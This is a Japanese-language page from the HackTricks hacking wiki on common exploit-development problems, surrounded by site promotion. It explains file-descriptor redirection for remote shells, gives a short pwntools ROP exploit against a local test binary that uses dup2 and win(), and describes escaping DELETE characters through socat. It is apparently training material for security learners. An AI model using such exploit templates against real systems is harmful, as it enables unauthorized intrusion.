Common Exploiting Problems

htARTE（HackTricks AWS Red Team Expert） を通じて、ゼロからヒーローまでAWSハッキングを学ぶ！

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝してみたいですか？または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
公式PEASS＆HackTricksスウェグを手に入れましょう
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm。
ハッキングテクニックを共有するために、PRを hacktricks repo と hacktricks-cloud repo に提出してください。

リモートエクスプロイテーションにおけるFDs

たとえば、リモートサーバーに**system('/bin/sh')**を呼び出すエクスプロイトを送信すると、これはもちろんサーバープロセスで実行され、/bin/shはstdin（FD：0）からの入力を期待し、stdoutおよびstderr（FDs 1および2）に出力を表示します。したがって、攻撃者はシェルと対話することができません。

これを修正する方法は、サーバーが起動したときにFD番号3（リスニング用）を作成し、その後、接続が**FD番号4**になると仮定することです。したがって、シェルに連絡を取ることが可能になります。

ここからのエクスプロイト例

from pwn import *

elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)

rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()

p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()

Socat & pty

socatは既に**stdinとstdoutをソケットに転送しています。ただし、ptyモードにはDELETE文字が含まれています**。したがって、\x7f（DELETE -）を送信すると、エクスプロイトの前の文字が削除されます。

これをバイパスするには、\x7fを送信する前にエスケープ文字\x16を付加する必要があります。

ここではこの動作の例を見つけることができます。

htARTE（HackTricks AWS Red Team Expert）でAWSハッキングをゼロからヒーローまで学ぶ こちら！

サイバーセキュリティ企業で働いていますか？ HackTricksで会社を宣伝したいですか？または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか？SUBSCRIPTION PLANSをチェックしてください！
The PEASS Family、当社の独占的なNFTsコレクションを発見
公式PEASS＆HackTricksスウェグを手に入れる
💬Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm。
ハッキングトリックを共有するために、hacktricksリポジトリ およびhacktricks-cloudリポジトリ にPRを提出してください。

PreviousWWW2Exec - __malloc_hook NextWindows Exploiting (Basic Guide - OSCP lvl)

Last updated 1 month ago